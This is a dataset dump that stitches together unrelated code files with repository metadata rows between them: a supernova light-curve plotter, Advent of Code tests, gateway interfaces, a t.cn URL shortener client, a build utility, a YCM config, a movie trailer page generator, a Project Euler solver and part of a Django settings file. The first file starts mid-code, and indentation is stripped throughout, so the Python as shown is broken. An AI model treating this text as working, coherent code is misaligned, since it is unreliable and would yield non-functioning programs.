fit_r = fit.lcsDict['r']
if c[b] > nrows-1:
c[b] = 0
r[b] += 1
xlim = dictAx[b][r[b], c[b]].get_xlim()
ylim = dictAx[b][r[b], c[b]].get_ylim()
dictAx[b][r[b], c[b]].set_xticks([0])
dictAx[b][r[b], c[b]].set_yticks([0])
dictAx[b][r[b], c[b]].set_xticklabels(['0'])
dictAx[b][r[b], c[b]].set_yticklabels(['0'])
if (data.badCurve == False) and (fit_b.badCurve == False) and (fit.r.badCurve == False):
epoch = util.time_correct(data.mjd,
candidate.zSpec if candidate.zSpec else candidate.zPhotHost)
epoch = [val-fit_r.mjd[fit_r.max_flux_index] for val in epoch]
if fit.peaked == False:
epoch = [val+fit.ccMjdMaxFlux for val in epoch]
flux = util.correct_for_absorption(data.flux,
candidate.MWEBV, b)
"""
Setting limits for plot axes
"""
if min(fit_b.flux) < min(flux):
y_min = min(fit_b.flux) - 3*max(fit_b.fluxErr)
else:
y_min = min(flux) - np.median(data.fluxErr)
if max(fit_b.flux) > max(flux):
y_max = max(fit_b.flux) + 3*max(fit_b.fluxErr)
else:
y_max = max(flux) + np.median(data.fluxErr)
dictAx[b][r[b], c[b]].set_ylim(y_min, y_max)
"""
Setting limits for fill_between
"""
fluxUpLim = [val for val in [
fit_b.flux[el] + fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.4, linewidth=0.5)
"""
Setting limits for fill_between
"""
fluxUpLim = [val for val in [
fit_b.flux[el] + 2*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - 2*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.2, linewidth=0.5)
"""
Setting limits for fill_between
"""
fluxUpLim = [val for val in [
fit_b.flux[el] + 3*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - 3*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.1, linewidth=0.5)
dictAx[b][r[b], c[b]].plot(fit_b.shiftedMjd, fit_b.flux,
color='#7f0000',
linewidth=2)
scatterLab = 'SN ID {:<d}'.format(candidate.SNID)
dictAx[b][r[b], c[b]].scatter(epoch, flux,
s=10, label=scatterLab, c='black', marker='x')
dictAx[b][r[b], c[b]].errorbar(epoch, flux,
data.fluxErr, fmt=None, color='black', ecolor='black')
if not fit.peaked:
pass
dictAx[b][r[b], c[b]].legend(
loc='best', framealpha=0.3, fontsize='10')
else:
label = str(candidate.SNID)+" BAD CURVE"
dictAx[b][r[b], c[b]].plot([0, 1], [0, 1], color='red',
label=label)
dictAx[b][r[b], c[b]].plot([0, 1], [1, 0], color='red')
dictAx[b][r[b], c[b]].legend(
loc='best', framealpha=0.3, fontsize='10')
c[b] += 1
print indent + "Plots saved in files:"
if not os.path.exists(path.abspath(args.dirFit + "plots" + os.sep)):
os.makedirs(args.dirFit + "plots")
for b in dictFig.keys():
dictFig[b].savefig(
args.dirFit + "plots"+ os.sep + GPkern + \
"_band_{:<1}_{:<f}.png".format(b,timeMark),
dpi=300
)
print indent + " - " + args.dirFit + "plots" + os.sep + \
GPkern + "_band_{:<1}_{:<f}.png".format(b,timeMark)
plt.close('all')
"""
PLOT OBSERVATION AND FIT (publication style)
--nice-plots
"""
if args.nicePlots:
"""
1 candidate
choose how many bands
make the plot with confidence regions
"""
# if args.nBands != 1 or args.nBands != 4:
# args.nBands = 1
if args.cand == -1:
args.cand = np.random.random_integers(
low=0, high=len(lsDirData))
fname = 'DES_SN{:0>6d}.DAT'.format(args.cand)
candidate = util.get_sn_from_file(
args.dirData+fname
)
fname = 'DES_SN{:0>6d}_FIT.DAT'.format(args.cand)
tmpSN = util.get_sn_from_file(
args.dirFit+fname,
magFlag=args.mag,
)
"""
Initializing SupernovaFit object
"""
fit = cls.SupernovaFit(tmpSN, tmpSN.kern if hasattr(tmpSN, 'kern') else None)
for b in tmpSN.lcsDict.keys():
fit.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr,
magFlag=args.mag
)
if fit.r.badCurve:
raise SystemExit('Bad r curve!')
fit.shift_mjds()
"""
Fixing shiftedMjd for not-peaked LCs
"""
if fit.peaked == False:
"""
correcting using CC results
"""
for b in candidate.lcsDict.keys():
fit.lcsDict[b].shiftedMjd = [el + fit.ccMjdMaxFlux
for el in fit.lcsDict[b].shiftedMjd]
bands = candidate.lcsDict.keys() if args.allBands else args.band
"""
Pre-process data so to be compared with fit (made from
pre-precessed data)
"""
for b in bands:
if (not candidate.lcsDict[b].badCurve) and (not fit.lcsDict[b].badCurve):
candidate = util.pre_process(candidate, b)
candidate.lcsDict[b].mjd = [el - fit.r.mjd[fit.r.max_flux_index]
for el in candidate.lcsDict[b].mjd]
if fit.peaked == False:
candidate.lcsDict[b].mjd = [el + fit.ccMjdMaxFlux
for el in candidate.lcsDict[b].mjd]
else:
raise SystemExit('Bad {:1s} curve!'.format(b))
if args.allBands:
fig, ax = plt.subplots(nrows=2, ncols=2,
# figsize=(16.5, 11.7),
tight_layout=False
)
axDict = {
'g':ax[0,0],
'r':ax[0,1],
'i':ax[1,0],
'z':ax[1,1]
}
# fig.subplots_adjust(left=0.05, right=0.97, top=0.94, wspace=0.29)
else:
fig = plt.figure()
xlim = [-35,12]
ylim = [-10,10]
# fig, ax = plt.subplots(nrows=2, ncols=1,
# # figsize=(16.5, 11.7),
# tight_layout=False
# )
# axDict = {
# 'g':ax[0,0],
# 'r':ax[0,1],
# 'i':ax[1,0],
# 'z':ax[1,1]
# }
if not args.allBands:
fit_b = fit.lcsDict[args.band]
data = candidate.lcsDict[args.band]
if not data.badCurve and not fit_b.badCurve:
epoch = data.mjd
flux = data.flux
"""
Setting limits for fill_between
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.4, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.4, linewidth=0.5)
"""
Setting limits for fill_between
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + 2*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - 2*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.2, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.2, linewidth=0.5)
"""
Setting limits for fill_between
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + 3*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - 3*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.1, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.1, linewidth=0.5)
plt.plot(fit_b.shiftedMjd, fit_b.flux,
color='#7f0000',
linewidth=2,
label='GP fit')
# axDict[b].plot(fit_b.shiftedMjd, fit_b.flux,
# color='#7f0000',
# linewidth=2)
plt.scatter(epoch, flux,
s=30, label='data', c='black', marker='x')
# axDict[b].scatter(epoch, flux,
# s=10, label=str(candidate.SNID), c='black', marker='x')
plt.errorbar(epoch, flux,
data.fluxErr, fmt=None, color='black', ecolor='black')
# plt.xlim(xlim)
plt.ylim(ylim)
title = 'SN ID {:d} - Band {:s}'.format(candidate.SNID, args.band)
plt.title(title)
plt.xlabel('Epoch [mjd]')
plt.ylabel('Flux [adu]')
plt.legend(loc='upper right', scatterpoints=1)
# axDict[b].errorbar(epoch, flux,
# data.fluxErr, fmt=None, color='black', ecolor='black')
print "\n" + indent \
+ "The process took {:5.3f} secs.".format(time.time()-start_time)
|
unlicense
| -168,076,514,215,684,130
| 34.063946
| 108
| 0.443582
| false
| 4.110367
| false
| false
| false
|
mpirnat/aoc2016
|
day22/test.py
|
1
|
1854
|
#!/usr/bin/env python
import unittest
from day22 import Node, make_nodes, viable_nodes
class TestMakingNodes(unittest.TestCase):
def test_makes_nodes_from_input(self):
df = """
/dev/grid/node-x0-y0 87T 71T 16T 81%
/dev/grid/node-x0-y1 93T 72T 21T 77%
/dev/grid/node-x1-y0 86T 66T 20T 76%
/dev/grid/node-x1-y1 93T 64T 29T 68%
"""
nodes = make_nodes(df)
self.assertEqual(nodes, [
[Node(name='node-x0-y0', size=87, used=71, avail=16),
Node(name='node-x1-y0', size=86, used=66, avail=20)],
[Node(name='node-x0-y1', size=93, used=72, avail=21),
Node(name='node-x1-y1', size=93, used=64, avail=29)]])
class TestFindingViableNodes(unittest.TestCase):
grid = [
[Node(name='A', size=100, used=1, avail=99),
Node(name='B', size=100, used=50, avail=50)],
[Node(name='C', size=100, used=0, avail=100),
Node(name='D', size=100, used=100, avail=0)],
[Node(name='E', size=50, used=10, avail=40),
Node(name='F', size=100, used=60, avail=40)]]
def test_finds_viable_nodes(self):
grid = self.grid
nodes = viable_nodes(grid)
self.assertEqual(nodes, {
(grid[0][0], grid[0][1]),
(grid[0][0], grid[1][0]),
(grid[0][0], grid[2][0]),
(grid[0][0], grid[2][1]),
(grid[0][1], grid[0][0]),
(grid[0][1], grid[1][0]),
(grid[1][1], grid[1][0]),
(grid[2][0], grid[0][0]),
(grid[2][0], grid[0][1]),
(grid[2][0], grid[1][0]),
(grid[2][0], grid[2][1]),
(grid[2][1], grid[0][0]),
(grid[2][1], grid[1][0])})
if __name__ == '__main__':
unittest.main()
|
mit
| 3,496,811,144,772,983,300
| 32.709091
| 67
| 0.481122
| false
| 2.843558
| true
| false
| false
|
cordis/pycloudia-chat
|
pyligaforex/services/gateways/interfaces.py
|
1
|
3985
|
from abc import ABCMeta, abstractmethod
class IServiceFactory(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_service(self):
"""
:rtype: L{pyligaforex.services.gateways.interfaces.IService}
"""
class IService(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_gateway(self, channel):
"""
:type channel: L{pycloudia.services.beans.Channel}
:rtype: L{Deferred} of C{None}
"""
@abstractmethod
def delete_gateway(self, runtime, reason=None):
"""
:type runtime: C{str}
:type reason: C{str} or C{None}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def authenticate_gateway(self, runtime, user_id):
"""
:type runtime: C{str}
:type user_id: C{str}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def process_incoming_package(self, runtime, package):
"""
:type runtime: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def process_outgoing_package(self, runtime, package):
"""
:type runtime: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
class IGateway(object):
__metaclass__ = ABCMeta
@abstractmethod
def set_client_user_id(self, user_id):
"""
:type user_id: C{str}
:rtype: L{Deferred} of C{None}
"""
@abstractmethod
def process_incoming_package(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.HeaderNotFoundError}
"""
@abstractmethod
def process_outgoing_package(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
"""
class IGatewayFactory(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_gateway(self, channel):
"""
:type channel: L{pycloudia.services.beans.Channel}
:rtype: L{pyligaforex.services.gateways.interfaces.IGateway}
"""
class IRouter(object):
__metaclass__ = ABCMeta
@abstractmethod
def get_target_channel(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{pycloudia.services.beans.Channel}
:raise: L{pyligaforex.services.gateways.exceptions.HeaderNotFoundError}
:raise: L{pyligaforex.services.gateways.exceptions.ServiceNotFoundError}
"""
class IDao(object):
__metaclass__ = ABCMeta
@abstractmethod
def set_gateway_client_address(self, client_id, facade_address):
"""
:type client_id: C{str}
:type facade_address: C{str}
:return: deferred with facade_address
:rtype: L{Deferred} of C{str}
"""
@abstractmethod
def set_gateway_client_user_id(self, client_id, user_id):
"""
:type client_id: C{str}
:type user_id: C{str}
:return: deferred with user_id
:rtype: L{Deferred} of C{str}
"""
class IClients(object):
__metaclass__ = ABCMeta
@abstractmethod
def process_outgoing_package(self, client_address, client_id, package):
"""
:type client_address: C{str}
:type client_id: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
"""
|
mit
| 484,113,746,543,363,000
| 26.867133
| 80
| 0.611794
| false
| 3.682994
| false
| false
| false
|
SmallFatCYW/tcn-analysis-python
|
tcnanalysis.py
|
1
|
2745
|
#!/usr/bin/env python
"""
____ _____ _ _ _
| _ \ _ |_ _|__ _ __ / \ _ __ __ _| |_ _ ___(_)___
| |_) | | | || |/ __| '_ \ / _ \ | '_ \ / _` | | | | / __| / __|
| __/| |_| || | (__| | | |/ ___ \| | | | (_| | | |_| \__ \ \__ \
|_| \__, ||_|\___|_| |_/_/ \_\_| |_|\__,_|_|\__, |___/_|___/
|___/ |___/
t.cn JSON and XML Analysis - v0.2Fix
By iPixelOldC & http://hoc117.top
License: MIT
"""
import json
import xml.etree.cElementTree as et
import urllib.request
import re
import os
def JSONReturn(site):
"""
json analysis: JSONReturn(site='Website URL(format:http[s]://xxx)')
return: {'url_short': 'http://t.cn/xxx', 'url_long': site, 'type': 0}
type: 链接的类型,0:普通网页(site page)、1:视频(video)、2:音乐(music)、3:活动(activity)、5、投票(vote)
"""
response = urllib.request.urlopen('http://api.t.sina.com.cn/short_url/shorten.json?source=3271760578&url_long={0!s}'.format((site)))
html = response.read().decode('utf8')
loads = json.loads(str(html))
return loads[0]
def XMLReturn(site):
"""
xml analysis: XMLReturn(site='Website URL(format:http[s]://xxx)')
return: {'url_short': 'http://t.cn/xxx', 'url_long': site}
"""
response = urllib.request.urlopen('http://api.t.sina.com.cn/short_url/shorten.xml?source=3271760578&url_long={0!s}'.format((site)))
html = response.read().decode('utf8')
loads = et.fromstring(str(html))[0]
return {"url_short": loads[0].text, "url_long": loads[1].text, "type": loads[2].text}
if __name__ == "__main__":
print(__doc__)
inputurl = input('>>Please enter url: ')
if 'http://' in inputurl:
pass
else:
inputurl = 'http://'+inputurl
while True:
inputJorX = input('>>(x)ml or (j)son: ').lower()
if inputJorX not in ('x', 'j'):
print("> Please enter 'x' or 'j'!")
else:
break
if 'x' == inputJorX:
r_xml = XMLReturn(inputurl)
print(">>{0!s}: \n> Short URL: {1!s}".format(r_xml["url_long"], r_xml["url_short"]))
if 'j' == inputJorX:
r_json = JSONReturn(inputurl)
print(">>{0!s}: \n> Short URL: {1!s}".format(r_json["url_long"], r_json["url_short"]))
while True:
save_yn = input('>>Do you want to save it?[Y/n]').lower()
if save_yn == 'n':
break
elif save_yn == 'y':
print("> Saving...")
open('{0!s}.json'.format((re.search(r'(http://+)(.*)', inputurl).group(2))), 'w+').write(str(JSONReturn(inputurl)))
print("> OK")
break
else:
print('Please enter (y) or (n)')
|
mit
| 2,421,101,698,474,163,000
| 36.388889
| 136
| 0.48272
| false
| 2.844609
| false
| false
| false
|
iamroger/vpn
|
win/utils.py
|
1
|
3331
|
import os, sys, re, shutil, tarfile, subprocess
j = os.path.join
class Cd(object):
"""
Cd is a context manager that allows
you to temporary change the working directory.
with Cd(dir) as cd:
...
"""
def __init__(self, directory):
self._dir = directory
def orig(self):
return self._orig
def __enter__(self):
self._orig = os.getcwd()
os.chdir(self._dir)
return self
def __exit__(self, *args):
os.chdir(self._orig)
class ModEnv(object):
"""
Context manager for temporarily
modifying an env var. Normally used to make
changes to PATH.
"""
def __init__(self, key, value):
self.key = key;
self.value = value;
def __enter__(self):
self.orig_value = os.environ.get(self.key)
os.environ[self.key] = self.value
return self
def __exit__(self, *args):
if self.orig_value is not None:
os.environ[self.key] = self.orig_value
def rmtree(dir):
print "RMTREE", dir
shutil.rmtree(dir, ignore_errors=True)
def makedirs(dir):
print "MAKEDIRS", dir
os.makedirs(dir)
def wipetree(dir):
print "WIPETREE", dir
shutil.rmtree(dir, ignore_errors=True)
if not os.path.isdir(dir):
os.mkdir(dir)
def extract_dict(d, k, default=None):
if k in d:
v = d[k]
del d[k]
else:
v = default
return v
def scan_prefixes(prefix, dir):
fns = []
for dirpath, dirnames, filenames in os.walk(dir):
for f in filenames:
if f.startswith(prefix):
fns.append(f)
break
return fns
def one_prefix(prefix, dir):
f = scan_prefixes(prefix, dir)
if len(f) == 0:
raise ValueError("prefix %r not found in dir %r" % (prefix, dir))
elif len(f) >= 2:
raise ValueError("prefix %r is ambiguous in dir %r: %r" % (prefix, dir, f))
return f[0]
def tarsplit(fn):
if fn.endswith(".tar.gz") or fn.endswith(".tgz"):
t = 'gz'
b = fn[:-7]
elif fn.endswith(".tar.bz2") or fn.endswith(".tbz"):
t = 'bz2'
b = fn[:-8]
else:
raise ValueError("unrecognized tar file type: %r" % (fn,))
return b, t
def tarextract(fn, t):
print "TAR EXTRACT %s [%s]" % (fn, t)
tar = tarfile.open(fn, mode='r:'+t)
try:
tar.extractall()
finally:
tar.close()
def expand(pkg_prefix, srcdir):
f = one_prefix(pkg_prefix, srcdir)
b, t = tarsplit(f)
# remove previous directory
rmtree(b)
# expand it
tarextract(os.path.join(srcdir, f), t)
return b
def call(cmd, **kw):
print "***", cmd
ignore_errors = extract_dict(kw, 'ignore_errors', False)
extra_env = extract_dict(kw, 'extra_env', None)
if extra_env:
env = kw.get('env', os.environ).copy()
env.update(extra_env)
kw['env'] = env
succeed = extract_dict(kw, 'succeed', 0)
ret = subprocess.call(cmd, **kw)
if not ignore_errors and ret != succeed:
raise ValueError("command failed with status %r (expected %r)" % (ret, succeed))
def vc_cmd(parms, cmd, succeed=0):
with ModEnv('PATH', "%s;%s\\VC" % (os.environ['PATH'], parms['MSVC_DIR'])):
status = call('vcvarsall.bat x86 && %s' % (cmd,), shell=True, succeed=succeed)
|
agpl-3.0
| 2,720,960,673,189,920,000
| 23.674074
| 88
| 0.565296
| false
| 3.278543
| false
| false
| false
|
RomanPlusPlus/smartGroceryList
|
.ycm_extra_conf.py
|
1
|
3559
|
import os
import sys
import ycm_core
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
preferred_build_type = 'debug'
flags = [
'-std=c++11'
,'-Wall'
,'-Wextra'
,'-Wconversion'
,'-Wno-deprecated'
,'-I%s' % os.path.join(DirectoryOfThisScript(), 'build', preferred_build_type, 'src')
,'-I%s' % os.path.join(DirectoryOfThisScript(), 'src')
]
compilation_database_folder = os.path.join(DirectoryOfThisScript(), 'build')
configurations = ['debug', 'release']
databases = []
for conf in configurations:
path = os.path.join(compilation_database_folder, conf)
if os.path.exists(path):
databases.append(ycm_core.CompilationDatabase(path))
SOURCE_EXTENSIONS = ['.cpp', '.cxx', '.cc', '.c', '.m', '.mm']
def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
if not working_directory:
return list(flags)
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join(working_directory, flag)
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join(working_directory, path)
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile(filename):
extension = os.path.splitext(filename)[1]
return extension in ['.h', '.hxx', '.hpp', '.hh']
def GetCompilationInfoForFileInDb(database, filename):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile(filename):
basename = os.path.splitext(filename)[0]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists(replacement_file):
compilation_info = database.GetCompilationInfoForFile(replacement_file)
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile(filename)
def GetCompilationInfoForFile(filename):
for db in databases:
info = GetCompilationInfoForFileInDb(db, filename)
if info is None:
continue
else:
return info
return None
def FlagsForFile(filename, **kwargs):
if len(databases) != 0:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile(filename)
if not compilation_info:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)
else:
final_flags = MakeRelativePathsInFlagsAbsolute(compilation_info.compiler_flags_, compilation_info.compiler_working_dir_)
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)
return {
'flags': final_flags,
'do_cache': True
}
|
gpl-3.0
| -8,626,690,842,388,371,000
| 31.651376
| 132
| 0.638944
| false
| 3.864278
| false
| false
| false
|
pzbadams/udacity
|
fresh_tomatoes.py
|
1
|
5784
|
import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<style type="text/css" media="screen">
body {
padding-top: 80px;
}
#trailer .modal-dialog {
margin-top: 200px;
width: 640px;
height: 480px;
}
.hanging-close {
position: absolute;
top: -12px;
right: -12px;
z-index: 9001;
}
#trailer-video {
width: 100%;
height: 100%;
}
.movie-tile {
margin-bottom: 20px;
padding-top: 20px;
}
.movie-tile:hover {
background-color: #EEE;
cursor: pointer;
}
.scale-media {
padding-bottom: 56.25%;
position: relative;
}
.scale-media iframe {
border: none;
height: 100%;
position: absolute;
width: 100%;
left: 0;
top: 0;
background-color: white;
}
</style>
<script type="text/javascript" charset="utf-8">
// Pause the video when the modal is closed
$(document).on('click', '.hanging-close, .modal-backdrop, .modal', function (event) {
// Remove the src so the player itself gets removed, as this is the only
// reliable way to ensure the video stops playing in IE
$("#trailer-video-container").empty();
});
// Start playing the video whenever the trailer modal is opened
$(document).on('click', '.movie-tile', function (event) {
var trailerYouTubeId = $(this).attr('data-trailer-youtube-id')
var sourceUrl = 'http://www.youtube.com/embed/' + trailerYouTubeId + '?autoplay=1&html5=1';
$("#trailer-video-container").empty().append($("<iframe></iframe>", {
'id': 'trailer-video',
'type': 'text-html',
'src': sourceUrl,
'frameborder': 0
}));
});
// Animate in the movies when the page loads
$(document).ready(function () {
$('.movie-tile').hide().first().show("fast", function showNext() {
$(this).next("div").show("fast", showNext);
});
});
</script>
</head>
'''
# The main page layout and title bar
main_page_content = '''
<!DOCTYPE html>
<html lang="en">
<body>
<!-- Trailer Video Modal -->
<div class="modal" id="trailer">
<div class="modal-dialog">
<div class="modal-content">
<a href="#" class="hanging-close" data-dismiss="modal" aria-hidden="true">
<img src="https://lh5.ggpht.com/v4-628SilF0HtHuHdu5EzxD7WRqOrrTIDi_MhEG6_qkNtUK5Wg7KPkofp_VJoF7RS2LhxwEFCO1ICHZlc-o_=s0#w=24&h=24"/>
</a>
<div class="scale-media" id="trailer-video-container">
</div>
</div>
</div>
</div>
<!-- Main Page Content -->
<div class="container">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#"><font size="6">Some of My Favorite Movies</font></a>
</div>
</div>
</div>
</div>
<div class="container">
{movie_tiles}
</div>
</body>
</html>
'''
# A single movie entry html template
movie_tile_content = '''
<div class="col-md-10 col-lg-4 movie-tile text-center" data-trailer-youtube-id="{trailer_youtube_id}" data-toggle="modal" data-target="#trailer">
<img src="{poster_image_url}" width="165" height="257">
<h2><font size="5">{movie_title}</font></h2>
<h3><font size="4">{movie_year}</font></h3>
<h4><font size="4">{movie_rating}</font></h4>
<h5><font size="2">{movie_storyline}</font></h5>
</div>
'''
def create_movie_tiles_content(movies):
# The HTML content for this section of the page
content = ''
for movie in movies:
# Extract the youtube ID from the url
youtube_id_match = re.search(r'(?<=v=)[^&#]+', movie.trailer_youtube_url)
youtube_id_match = youtube_id_match or re.search(r'(?<=be/)[^&#]+', movie.trailer_youtube_url)
trailer_youtube_id = youtube_id_match.group(0) if youtube_id_match else None
# Append the tile for the movie with its content filled in
content += movie_tile_content.format(
movie_title=movie.title,
movie_year=movie.year,
movie_rating=movie.rating,
movie_storyline=movie.storyline,
poster_image_url=movie.poster_image_url,
trailer_youtube_id=trailer_youtube_id
)
return content
def open_movies_page(movies):
# Create or overwrite the output file
output_file = open('fresh_tomatoes.html', 'w')
# Replace the placeholder for the movie tiles with the actual dynamically generated content
rendered_content = main_page_content.format(movie_tiles=create_movie_tiles_content(movies))
# Output the file
output_file.write(main_page_head + rendered_content)
output_file.close()
# open the output file in the browser
url = os.path.abspath(output_file.name)
webbrowser.open('file://' + url, new=2) # open in a new tab, if possible
|
gpl-2.0
| -5,111,499,279,754,586,000
| 34.054545
| 145
| 0.573824
| false
| 3.528981
| false
| false
| false
|
gillett-hernandez/project-euler
|
Python/problem_58.py
|
1
|
2420
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Gillett Hernandez
# @Date: 2016-03-21 22:33:46
# @Last Modified by: Gillett Hernandez
# @Last Modified time: 2017-08-10 21:14:06
# from mfunctions import is_prime
from itertools import count, chain
from euler_funcs import is_prime_w_primes_given, get_primes, timed
# def lag(iterable):
# iterable = iter(iterable)
# lv = next(iterable)
# v = next(iterable)
# yield lv
# yield v
# while True:
# lv, v = v, next(iterable)
# yield v
# def double(iterable):
# for i in iter(iterable):
# yield ik
# yield i
# def dup_last(iterable):
# '''meant to be used with iterators of integers
# adds a duplicate of the last element'''
# for el in iterable:
# yield el
# yield el
# def square_spiral(s=None):
# # 1 1 2 2 3 3 4 4 5 5 6 6
# if s is not None:
# iterable = range(1, s-1)
# else:
# iterable = count(1)
# C = 0
# for i in dup_last(double(iterable)):
# C += i
def eval_proportion(L, lL):
assert isinstance(L, list), L
assert len(L) == 3, L
# each sublist of L will contain necessarily distinct numbers
C = lL * 4 + 1
C1 = len(L[0])*4 + 1
assert C == C1, (lL, len(L[0]))
c = 0
for n in chain(*L):
if is_prime(n):
c += 1
return c*100 / C
def square_spiral(N=None, limit=None, primef = lambda n: is_prime(n)):
# br = ((2*i+1)**2 for i in count(1)) # bottom right, the squares
bl = ((2*i+1)**2-2*i for i in count(1)) # bottom left
tl = ((2*i+1)**2-4*i for i in count(1)) # topleft
tr = ((2*i+1)**2-6*i for i in count(1)) # topright
c = 0
for i in count():
C = (i+1) * 4 + 1
for g in [bl, tl, tr]:
ng = next(g)
if primef(ng):
# print(ng)
c += 1
p = c*100 / C
if limit is not None and p < limit:
break
if N is not None and i > N-2:
print("bksadiwoqndnslknlasdbllaarrghghghghghgh", i)
break
return i, p
@timed
def main():
# print(square_spiral(3))
# print(square_spiral(20000, 10))
primes = get_primes(limit=27000)
primef = lambda n: is_prime_w_primes_given(n, primes)
radius, proportion = square_spiral(limit=10, primef=primef)
print((radius+1)*2+1)
if __name__ == '__main__':
main()
|
mit
| 6,795,844,792,540,024,000
| 24.744681
| 70
| 0.544215
| false
| 2.877527
| false
| false
| false
|
lborgav/cookiecutter-django
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/{{cookiecutter.project_name}}/settings/base.py
|
1
|
7003
|
# Django base settings for {{cookiecutter.project_name}} project.
from os.path import abspath, basename, dirname, join, normpath
from sys import path
########## PATH CONFIG
# Absolute filesystem path to the Django project folder:
PROJECT_ROOT = dirname(dirname(dirname(abspath(__file__))))
# Absolute filesystem path to the repository folder:
REPO_ROOT = dirname(PROJECT_ROOT)
# Site name:
SITE_NAME = basename(PROJECT_ROOT)
# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(PROJECT_ROOT)
########## END PATH CONFIG
########## MANAGER CONFIG
ADMINS = (
('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'),
)
MANAGERS = ADMINS
########## END MANAGER CONFIG
########## AUTH MODEL CONFIG
# AUTH_USER_MODEL = 'accounts.CustomUser'
########## END AUTH MODEL CONFIG
